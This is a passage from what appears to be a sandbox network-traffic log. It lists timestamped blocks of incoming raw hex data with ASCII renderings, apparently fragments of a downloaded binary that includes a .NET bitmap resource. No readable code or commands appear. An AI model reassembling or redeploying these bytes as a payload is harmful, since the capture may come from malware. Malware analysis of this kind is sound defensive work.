2021-10-16 14:53:39 UTC	4253	IN	Data Raw: df e2 71 31 46 d9 be 6c 6c 35 5c f7 27 f3 f5 2c 68 b5 77 8e f2 7b e4 87 6e bd 87 ea 77 63 20 d1 16 18 87 90 90 9b fe d2 d1 63 c7 46 db 12 22 6b 73 af a9 5a d2 bf 07 a9 eb 3b 82 c1 59 f9 f3 d2 5e 0b d0 9f e6 5f 74 ef 9d 6d a8 9b 6d e7 7c 13 95 f1 36 85 15 28 36 51 d3 ea a0 10 09 a8 e6 b9 15 dd 74 be c2 a5 9f 59 75 ba bc 6f 93 33 ea 4e d0 83 72 64 2a 7e 26 76 18 4a 57 e4 a0 9b 4a 5e 3c 12 ee 3d 0a f3 a3 e1 b0 34 ce 1c d2 9e 2d d7 b4 5f 21 5d 9e 2a 32 28 0a af 4e 42 cb 54 12 f0 8b 07 f8 5c dc 39 54 99 3a 41 6f 0f d9 70 7a 5b ee f2 f2 fb 7d 5e 15 25 72 98 f5 17 63 d2 33 30 c6 fd f8 ed ed 19 cd 9b 01 89 38 0d fe d5 61 21 4d af 19 38 45 f5 a3 17 4e 85 8e 21 d6 96 01 91 24 de cf 59 51 d4 3b 52 5d 30 1d 1a 74 c8 ec 82 c5 ae 38 fe 2a 22 c8 17 04 b0 f1 11 b0 e9 39 Data Ascii: q1Fll5\',hw{nwc cF"ksZ;Y^_tmm\|6(6QtYuo3Nrd~&vJWJ^<=4-_!]2(NBT\9T:Aopz[}^%rc308a!M8EN!$YQ;R]0t8*"9
2021-10-16 14:53:39 UTC	4269	IN	Data Raw: ce 66 f2 93 bb c4 32 db 37 6e 8c 10 b2 2c e0 49 6c ce 94 91 83 e9 f0 1c 77 a8 6a ce 55 51 a3 b2 7c 93 9c 9c 0a 5d c2 fd 1c 51 44 2c 3f a6 34 f0 01 e0 0e b7 33 54 41 43 e2 3a ae 0b ee f2 ef 47 2c ca aa 72 90 d7 8a 02 81 45 4f 27 84 5b 6f 7d 7d f9 1a 38 0d 0e 1f c9 a9 af de ce 50 ec 0f 16 0a fd c5 b5 df 1b 90 49 1b ff ff a0 f4 05 15 1e df 16 63 8b 3d a4 c3 c3 37 92 e4 83 b9 a4 d1 c6 c6 71 f3 1d fa 16 83 76 ac b4 24 4d ae 02 a2 c1 1a b3 db 19 27 97 cb 73 3f 7c 98 02 5b 23 60 71 f5 57 ee d4 68 e1 46 07 79 a1 fe b5 ce 4e b7 70 a5 6c e1 58 3c b2 85 3e b3 20 ea 44 25 06 81 95 f6 e7 de 04 61 69 20 1d 6a 13 fb 27 f2 02 a9 ef 3e 02 c3 58 60 6f 6f 80 03 34 fa 74 e0 2b bc e4 ae 5d 5e 5a 5e 83 ff 04 18 b1 f0 55 52 f9 78 e2 88 96 3c 75 93 c4 5c df 37 a7 30 92 80 a7 51 Data Ascii: f27n,IlwjUQ\|]QD,?43TAC:G,rEO'[o}}8PIc=7qv$M's?\|[#`qWhFyNplX<> D%ai j'>X`oo4t+]^Z^URx<u\70Q
2021-10-16 14:53:39 UTC	4285	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4301	IN	Data Raw: 5e d4 7b 40 91 97 92 4f d6 1d c2 4e b3 83 09 1e 4e 99 72 a5 d7 0e 04 4d 42 92 40 e9 c0 ba 18 00 1b b4 0e 35 7e c5 0f 20 fe e1 79 7c f0 d1 cc 34 6e 21 3d 19 d7 c4 9c 40 5d a7 70 e3 0e a9 c4 fc 11 49 86 1b fe 7a 7b 28 fe 33 ce 20 b7 fe 43 87 17 b5 4d cd 18 33 dd 1f 79 73 f8 74 54 c2 4c 34 8f d1 06 5c 2f ec c2 e3 ef 97 08 3d c6 cb d9 43 3f be 26 a0 f5 8d 5a f6 49 af bd 28 cb 96 54 ae 34 bf ac be 9b 0c a5 46 cc e5 99 f2 2d 16 bd 56 63 9a a9 35 d3 f5 2b f8 f1 e7 c2 bc 3b 4c ce 57 53 65 29 06 02 90 89 09 67 f3 c5 14 fa a5 3d 46 c0 10 57 df 5a 0f 37 33 26 69 e1 80 43 84 08 58 76 c1 6f da 5f b9 71 a0 90 e7 ae a3 b2 5a f1 2b d0 3e 45 cc 2a b8 71 b0 c0 e1 32 3a 73 30 88 f8 74 06 d5 84 69 9e ed ed 38 95 9c 3b c0 37 37 79 b2 bc 35 ed a4 e5 9b f9 0e 4a 53 4b 81 e3 15 Data Ascii: ^{@ONNrMB@5~ y\|4n!=@]pIz{(3 CM3ystTL4\/=C?&ZI(T4F-Vc5+;LWSe)g=FWZ73&iCXvo_qZ+>E*q2:s0ti8;77y5JSK
2021-10-16 14:53:39 UTC	4317	IN	Data Raw: f1 2d d0 a1 13 66 b6 02 c6 d4 1b ea 4e 27 49 26 28 df d4 1d ca 55 dc ad 9e 49 33 38 cb 16 54 0c 78 81 b6 86 7d ba b4 90 a8 c5 f0 2b cf f1 54 f6 37 0b 9c ab ce cf 5b 4d 3b b9 66 ba b4 f9 65 3e 11 51 2a 64 34 c4 40 96 0a 6b 3e f4 ed 1a e2 94 17 e8 51 d9 0a 3f 3f d7 f5 82 ea f8 ba c8 e9 e5 cc 0d b9 ae 64 5d bb 87 9f 21 8c 12 17 5c 6e 60 3f 3f 13 b2 0f b5 6c f3 fd ac 72 d5 85 b8 54 ec ca 51 1b a1 59 42 bf fe 1f 8b 9b 25 23 45 a7 17 ae 7d ed 73 c8 87 ac 8d 45 88 07 45 ad 04 85 7c fa 57 74 c4 3c 33 51 f0 1e 1e a5 ac ea ac 6d 58 39 9c a4 57 64 b0 3f 38 dd 52 22 8f 7c 36 c8 58 f0 c8 e3 fd 4f b4 a6 0a 5d c3 e8 83 72 56 07 58 52 ea 98 74 2f 52 78 9d b9 3b 6d 9e 94 7e a7 dc ec 0a 81 c5 10 7c 04 83 5b 4b 56 55 b1 52 b4 16 21 fa 84 e4 49 89 65 92 7c 15 59 85 da e2 a5 Data Ascii: -fN'I&(UI38Tx}+T7[M;fe>Q*d4@k>Q??d]!\n`??lrTQYB%#E}sEE\|Wt<3QmX9Wd?8R"\|6XO]rVXRt/Rx;m~\|[KVUR!Ie\|Y
2021-10-16 14:53:39 UTC	4333	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4349	IN	Data Raw: 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: stem.Drawing.BitmapDataBM6(,,
2021-10-16 14:53:39 UTC	4365	IN	Data Raw: dc 56 4e b1 95 ec 54 19 a8 ee 52 1e 38 30 db 5f b8 65 bf a8 47 2e dd 5d 50 26 a2 18 47 91 60 8f 0f 33 7f 75 ab d4 db e5 68 1a 3d fe b2 4e 6e e6 2a 77 84 51 0e 91 00 4a 39 da cb 8e 35 04 b1 b0 20 77 29 c3 71 07 cf f5 14 cf f3 b5 0e 60 ec d0 60 e0 18 b8 03 90 3d 12 f6 74 ed ef ac fe 48 90 27 50 d0 7f 89 df fe db 9f 8d 7b f8 f9 fe 29 2a 19 49 9c 9a 84 1b f5 c0 e3 ac 0f c5 ba dd 1d 13 fc 63 45 8c fe ab 17 13 f1 db 80 32 b1 d4 ab 4d 4b 55 5e 67 02 7d d7 f5 aa 2f 0f 3b 25 b4 f2 e1 93 bc 52 f3 2d ec 84 b0 20 50 ad a0 29 3f 21 20 c6 7c 92 c4 3f d4 ea 90 70 87 ae 2b d8 f2 78 42 9d 05 aa 36 b2 3f da 92 71 e2 bb 59 ae 49 2c b1 aa 4b cc d4 82 52 32 ea 5f 1e f9 e3 0b ee 43 e8 f9 19 65 59 24 98 cc d6 d9 36 fd 92 20 4e 02 a6 b9 ee 57 f4 e2 86 c0 53 52 a2 d9 e1 1a 47 eb Data Ascii: VNTR80_eG.]P&G`3uh=NnwQJ95 w)q``=tH'P{)IcE2MKU^g}/;%R- P)?! \|?p+xB6?qYI,KR2_CeY$6 NWSRG
2021-10-16 14:53:39 UTC	4381	IN	Data Raw: e3 77 b1 a1 c2 a5 6e d5 77 07 62 52 dc 72 e9 8c a7 57 04 17 3f 88 8d bc 78 03 d6 86 fc 8b 2a 30 61 b0 fd 1b d1 87 17 57 bf 6f 05 41 9f d6 75 56 aa ea b8 81 d4 32 ad 92 b1 d2 96 e6 27 7f f8 26 0c a7 59 45 d3 c7 e9 dc 05 6e 5a ac cf 73 81 7e 7d b6 ca e5 b0 16 53 a9 c5 dd fc 77 2a ff 09 db 73 e2 b9 c1 3b 82 67 33 1e 06 81 b1 f7 2b 13 f8 90 0c 73 c2 ed 2c 50 7c 04 bc 42 2d 26 a8 5c 56 46 0a 3f b0 46 36 a4 bb b4 29 07 f0 14 9f a1 65 b1 e5 36 95 70 4c 09 1e 7a ae 11 40 b0 dc 77 ab 99 15 71 a2 7d b0 ed 90 44 ba 2d 35 a9 e7 17 fa 46 e1 d5 70 9b b4 77 3a 00 b9 16 d0 da f3 f4 4c 8b 55 95 80 ad e8 4d c4 75 fe 03 c1 ef fd 9f c2 67 be 48 91 9d 5b e7 49 f4 5d 57 78 36 83 e7 2c ee 68 a6 2f 2a f7 66 35 de 7f a3 22 94 11 6d 25 e6 f3 45 dd 16 88 e6 88 fc 6a d6 92 51 32 c9 Data Ascii: wnwbRrW?x0aWoAuV2'&YEnZs~}Sws;g3+s,P\|B-&\VF?F6)e6pLz@wq}D-5Fpw:LUMugH[I]Wx6,h/*f5"m%EjQ2
2021-10-16 14:53:39 UTC	4397	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4413	IN	Data Raw: f1 ee f2 5e 30 3d b2 11 08 e1 50 00 22 3c e3 5a cd 4f b6 53 a5 11 b2 88 04 63 72 4e e3 b6 69 21 c4 4e d1 0b c8 55 68 91 a4 a1 1f 55 91 e7 27 4a 8e d8 5b 55 97 4e 76 27 10 29 c9 be fc 8a 45 1f 96 8a 22 b2 99 3f 21 76 41 41 17 da aa d2 f0 1c d4 e2 ac a1 5d ea 80 4b 2d 4e 0e ba 05 09 1e 3e 16 fc ed 81 aa b0 d3 64 94 14 25 ff e3 d5 08 cb 2a 17 af ad ba 11 49 75 dd 29 00 b5 86 b8 b9 5e 7d 67 d7 e6 0e ec 00 af ed 78 bc d4 c4 6f 59 2e 47 7e 81 4b c8 38 82 65 08 64 41 52 84 e3 55 51 be 93 82 86 51 f3 55 8e 2e 9c 2d a7 2f 33 f5 ab 02 89 59 15 78 00 03 f7 27 db 3b c1 6b 43 cc 5b 8c ff bf 8c b3 3f 03 13 04 2a e6 04 73 6f fb 69 bf a6 e8 29 f6 38 c5 37 36 86 9a d8 4e c3 be 68 45 39 f0 9f a5 93 ae ed be ae 98 4f 25 26 ea 4f 38 68 38 ab 15 17 c6 40 57 57 65 1a f4 4f d0 Data Ascii: ^0=P"<ZOScrNi!NUhU'J[UNv')E"?!vAA]K-N>d%Iu)^}gxoY.G~K8edARUQQU.-/3Yx';kC[?soi)876NhE9O%&O8h8@WWeO
2021-10-16 14:53:39 UTC	4429	IN	Data Raw: 41 07 2b ac 86 00 60 9b 09 c6 d0 39 4a 37 7b ec 5e b6 e8 79 f9 38 cb 90 8f db 65 48 e8 32 08 ff 24 21 fa 0e b9 68 a9 45 01 12 67 fe 3a e9 ca a0 75 c2 37 f8 62 d9 9e 41 a2 6f 3a 61 86 2a 7c 27 d7 71 a5 7d 7d 8b 96 4c 49 9d 2e e2 cb 37 41 35 6d ee 44 5d 33 a2 b9 40 b2 ce e2 ab 0e f0 50 37 91 0e ac 14 7b 5a aa d5 86 16 ef 59 bf 74 ca 79 a4 57 e6 b6 34 53 a6 33 42 d0 8f 46 d2 30 e9 21 f4 0e 0f ee 6b 19 f6 03 3a 03 ad 31 01 ba 6e 82 66 79 78 c0 95 c0 c8 a3 95 e7 2e 36 7a d2 21 41 9d a6 8b 37 bd 6b a9 10 2b ec b4 ea 09 6f e3 6c 62 90 88 6f ca 8d 71 71 b7 87 eb 75 49 91 91 12 a5 1a aa 43 99 95 35 53 e3 79 8e 73 f6 38 3e 7d 95 99 b6 f9 e6 86 47 51 b5 c0 e7 65 45 e2 c5 7b 60 fc 11 0e 09 93 b1 26 f5 4c 8e e3 2d f0 cf b9 9b 62 de 96 28 48 4c f1 ae 2d 84 93 a5 a2 44 Data Ascii: A+`9J7{^y8eH2$!hEg:u7bAo:a*\|'q}}LI.7A5mD]3@P7{ZYtyW4S3BF0!k:1nfyx.6z!A7k+olboqquIC5Sys8>}GQeE{`&L-b(HL-D
2021-10-16 14:53:39 UTC	4445	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 11 c2 b3 ee 1e bd 83 62 a7 f6 20 1d dd dc f2 dc cf af 37 5c 69 06 98 4c 6e ca 88 2f 30 71 6a 73 71 29 96 cf ed fa f7 4f 97 0a aa b7 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 5e d0 ef 73 67 ec 4e 99 fe 2e 86 2c 80 8e f1 17 1c de ee 8b 2e cd d0 3b 51 44 ba 25 02 2c 00 b1 e4 e5 7a f2 c2 ec ef a0 ac de 04 1e 94 25 bc 25 a9 f8 c7 a9 f4 71 09 78 f0 4f 16 6c bd 4e d7 ea 1a 5f 3a 73 95 39 b6 7b 8c e4 5b Data Ascii: b 7\iLn/0qjsq)O~^sgN.,.;QD%,z%%qxOlN_:s9{[
2021-10-16 14:53:39 UTC	4461	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4477	IN	Data Raw: 51 23 da 6f 07 e3 65 22 2a da df 51 9f 87 e9 df d8 0f e1 67 62 fe b8 46 af c1 ce f9 27 d0 2c 61 7f f0 55 8c ef 43 9c 3b 86 1a 40 1c 99 fe fc fb 19 77 79 88 3c e6 b2 59 00 73 be 58 7c 0c 11 20 5f 0a e8 b5 e4 d2 44 bd f9 d5 1b 57 93 33 1d aa 62 c3 41 f3 23 1f e8 d7 5f 55 1c 84 f6 61 12 d4 ee 2a 66 7d f8 19 37 5b 6a fc c6 f9 91 37 0a a7 79 bf 91 8b 15 01 07 22 f0 16 c1 f3 36 cf 31 d7 b8 f0 e7 d8 bb 0e 79 ad 75 ec ba 06 21 e1 99 37 e3 54 05 f2 30 f7 e0 de ae 59 7f fd 36 79 f8 8e f7 44 96 29 8a d6 f3 c9 80 17 3a 9e 51 d2 8d dc 5a 83 d3 30 7f e5 ea d1 f1 a4 4c 19 96 c7 78 6b 59 17 9f 11 71 29 ca 21 91 10 62 8c 5e ed f3 0a 64 bc 1c 50 81 6b a6 a1 66 19 a2 0e 4c 8b d3 de 40 75 66 87 b0 97 1c 78 02 eb 63 08 bc 0b 87 a5 a0 80 b5 cc 83 41 f5 0c 9a 88 d2 56 3c 05 a7 Data Ascii: Q#oe"QgbF',aUC;@wy<YsX\| _DW3bA#_Uaf}7[j7y"61yu!7T0Y6yD):QZ0LxkYq)!b^dPkfL@ufxcAV<
2021-10-16 14:53:39 UTC	4493	IN	Data Raw: 50 74 9e 38 0b fe 37 51 70 31 74 06 ff b7 a7 79 08 5f 56 e0 bc e2 70 0d 64 59 ec d2 f4 9e 1d b0 01 d4 71 26 1f fd 1c 7c 41 e7 2e 2e ea 25 0d d8 0f de 43 25 9b 7c 8a e0 a1 0f 01 56 30 3e 9b b8 ed 6e 51 76 c8 e4 f5 80 e6 dd 6d f1 d8 89 f6 3b 74 e3 4b 96 24 b5 32 22 6e 78 4b fc d3 71 c2 0b 55 4a 8b 56 2a ef 85 21 41 c3 ca 41 74 41 e6 50 16 11 73 98 0b bf 08 7f 67 e1 ba a6 70 05 b8 fb f3 b6 18 92 e7 be 1e d2 69 26 d3 1e 43 1f 25 92 d9 cf c6 33 09 c5 66 64 9e e8 7d 40 00 ba b8 84 46 0e 27 80 7e f3 5c 3e c8 df 5a 9c 58 cd 04 ca 65 77 43 60 e1 8b 66 1b 43 48 68 40 32 b4 27 bd 4c 36 fb 84 45 2f 17 9e 00 f6 bd b2 1a 41 ee 03 53 57 b1 d3 fa c4 0b 74 3d b4 4b 7d 8b 95 91 46 29 24 54 38 24 f9 e6 48 70 f9 67 32 2d ee 0b b5 5b 73 d7 e3 75 9b 40 6f 28 63 64 b3 b7 f7 7d Data Ascii: Pt87Qp1ty_VpdYq&\|A..%C%\|V0>nQvm;tK$2"nxKqUJV*!AAtAPsgpi&C%3fd}@F'~\>ZXewC`fCHh@2'L6E/ASWt=K}F)$T8$Hpg2-[su@o(cd}
2021-10-16 14:53:39 UTC	4509	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4525	IN	Data Raw: 5e ca 56 d9 e1 77 07 41 3b fa 92 a7 2c 76 f6 af cc 16 1b 55 f7 5b 4c 0e 38 8b 37 26 8a 35 04 71 9b d0 61 f4 a7 b9 e6 f0 a0 97 f3 bd f9 26 3c 56 e9 89 8c eb 0a 97 f6 0a 6e 27 b3 84 d3 c5 f4 82 c3 f8 a3 75 cc 08 14 cb 1c 48 89 83 5f 16 52 2b cf c8 48 ea 6d 62 a6 66 a5 85 cc b0 87 99 34 64 ba d4 11 ae 34 17 95 2b 65 b0 9b 98 ca d1 76 67 0f 75 f1 86 d6 ba 59 dc 8d 82 c9 45 20 42 c2 35 38 e1 ae 59 b8 60 23 4f 30 3b 39 a6 48 bf ec df 4c 87 f8 1c e3 b0 9e 88 aa 66 c0 66 d3 e4 ea 39 16 54 18 fe 33 8c b8 9e f2 e0 99 51 29 c4 ed 15 1d 86 2e e3 20 6a b4 f2 67 30 f3 30 37 69 71 80 0b 71 91 7d 27 24 2d 30 ad a7 81 33 eb 2b dc 2d 10 c7 6f 7f 41 90 2a cf c4 1f 80 ff ee f3 02 d2 73 bc 53 c6 85 06 d1 b1 da bb 42 5a a8 e2 b7 2d b9 0f bb 15 e6 45 ff a0 6a 2a 37 2e 0d 6b 2c Data Ascii: ^VwA;,vU[L87&5qa&<Vn'uH_R+Hmbf4d4+evguYE B58Y`#O0;9HLff9T3Q). jg007iqq}'$-03+-oAsSBZ-Ej7.k,
2021-10-16 14:53:39 UTC	4541	IN	Data Raw: 0e 75 ad 81 91 08 d3 70 5e 59 c4 63 f2 72 82 ad 32 28 5c 7d 74 bd 76 33 eb 35 85 06 69 25 1f e3 c1 1c f2 47 74 f7 5f ed c2 2c 7f ec 3e 9d 82 3d 08 33 aa 6c 65 7b e6 b2 bb 13 5f cd d1 d6 54 bd c1 88 8d 2e c7 c2 c0 c6 06 dd 91 9e 2d a7 ce f3 8c da 09 e9 10 fb c4 03 17 fb b9 81 df aa 7e a0 80 71 6f 26 b1 55 56 bd f7 a6 98 03 9b a8 47 7f c9 f5 d9 09 fd 68 e6 3b 0e 44 a3 35 c0 ac 09 11 79 e1 cf 1b 28 e2 1e 01 8e 44 a1 10 7a d2 5e 12 b3 9a a0 49 4d 53 9b 2a 73 d9 bc 66 78 b2 12 64 4c 6c 0e 74 58 b9 4f d3 bd 26 1b fd f2 57 b7 74 10 63 e6 78 6e 21 69 e0 e7 64 ae de 48 c8 3a c1 cf fa 50 a9 1f 34 4d 77 92 b3 69 1c d8 88 8d d7 ea 21 dc 71 e4 0d 9c 98 d6 83 03 53 df c4 b2 62 1a ee 02 18 35 67 6b 55 93 5c 89 b0 db 3e 92 9e e9 b4 be b0 01 cf 14 32 07 ea 0f ad 08 0c cf Data Ascii: up^Ycr2(\}tv35i%Gt_,>=3le{_T.-~qo&UVGh;D5y(Dz^IMS*sfxdLltXO&Wtcxn!idH:P4Mwi!qSb5gkU\>2
2021-10-16 14:53:39 UTC	4557	IN	Data Raw: 6b cf f8 66 12 1c 99 73 b9 c5 e2 fc b5 2f fc 9e 5e 69 75 fe fd 42 4c 35 46 a2 de fc 99 96 75 19 ec 4e 44 14 af 10 59 eb 21 79 76 97 39 fd ac 7e 9a bc 5b a7 6c df eb 25 98 96 df 53 1b 25 07 cf ed ff 22 14 8d da ea 43 2d 9d af 3c 9f 88 a3 44 84 70 31 6f 5b 33 53 c1 36 ef 66 5b e4 79 ed 23 14 3c 43 c5 93 80 12 f5 82 fb 1c 2f 18 8e 4b 64 14 bc 33 80 20 74 8c 42 97 39 1a 25 c0 91 69 f4 fd 42 44 ee 3a 33 42 2c b4 79 c1 ed 65 10 f6 72 69 97 f0 04 65 19 14 ec e7 52 04 60 d5 7c fa 80 32 0f 87 ae d2 3e 4c 72 40 c3 64 d9 fd 73 ea 2c 80 d8 cb 4e 6c 1a 03 f3 a7 09 c5 c3 43 51 1b c6 64 b7 ca f6 cb 0d 11 50 62 2f 68 28 08 f7 cc d6 2d 7b 60 a8 25 5a ad 54 e2 ca da 0a b0 5e 07 ee 74 41 3b 2e e8 3b 5c a5 66 bf 2f 15 7f bb ab 8e c0 f6 f8 d8 fc 38 7e 29 9f 9c 88 af 3d a3 e8 Data Ascii: kfs/^iuBL5FuNDY!yv9~[l%S%"C-<Dp1o[3S6f[y#<C/Kd3 tB9%iBD:3B,yerieR`\|2>Lr@ds,NlCQdPb/h(-{`%ZT^tA;.;\f/8~)=
2021-10-16 14:53:39 UTC	4573	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4589	IN	Data Raw: 6d d5 a4 69 a5 5c b9 32 02 1e 1d a9 2c af ae ac de ca 4d 8e 96 1e 80 0c 23 a0 59 47 b3 74 5f 59 9a 2b 5d a9 6f a5 0c 19 18 d8 f6 e2 19 2d e5 74 05 0a 09 14 4c 63 fa 59 75 31 c0 31 35 4b 61 4a f3 df 35 d7 ba ef 14 a6 0d 48 7d 4d 83 29 8f b8 09 14 39 4f 0b 74 c3 53 d3 b0 2a 42 f0 2c 9d c6 2a cf 3a 09 e9 73 59 16 00 35 75 9a c0 9c 44 15 09 bd 7c ca a3 d0 be 36 fb b6 b1 5a 12 2e dc 34 a1 c1 bc 0c d4 b4 2d 7f 54 67 da c7 a7 f3 0e 80 e4 2b 78 e2 ed 65 11 ab 10 37 57 33 3c 64 19 0a 24 ca b3 36 23 cc 1f e8 40 a4 71 9d 7d 86 2e 57 d9 d0 a2 94 2c 6b 2f ff f2 03 2f 86 29 1a f9 c6 ac a6 fa 65 1e 93 af 10 fa b5 77 60 59 23 df 8b b4 e0 79 af 48 53 fb 05 30 52 8a d4 45 51 59 4a 4a 53 9a 8d 60 3d 90 2d 01 53 ac 68 8c a6 50 d8 7c a0 93 02 cd 4e 93 22 cd 8f 50 3b 56 a5 3f Data Ascii: 